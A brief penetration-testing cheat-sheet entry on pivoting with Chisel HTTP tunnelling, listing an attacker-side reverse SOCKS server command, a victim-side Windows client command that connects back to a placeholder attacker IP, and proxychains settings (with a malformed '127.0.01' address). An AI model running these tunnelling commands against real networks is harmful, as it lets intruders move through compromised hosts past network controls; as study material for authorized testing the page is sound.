Chisel (http Tunneling)

Chisel (HTTP Tunnelling)

  • On attacker, ./chisel server -p 3477 --socks5 --reverse

  • On victim, Transfer chisel.exe on window, .\chisel.exe client <attacker-ip>:3477 R:5000:socks

  • Configure proxychain4.conf , socks5 127.0.01 5000

  • proxychains -q <tool>

Reference:

Last updated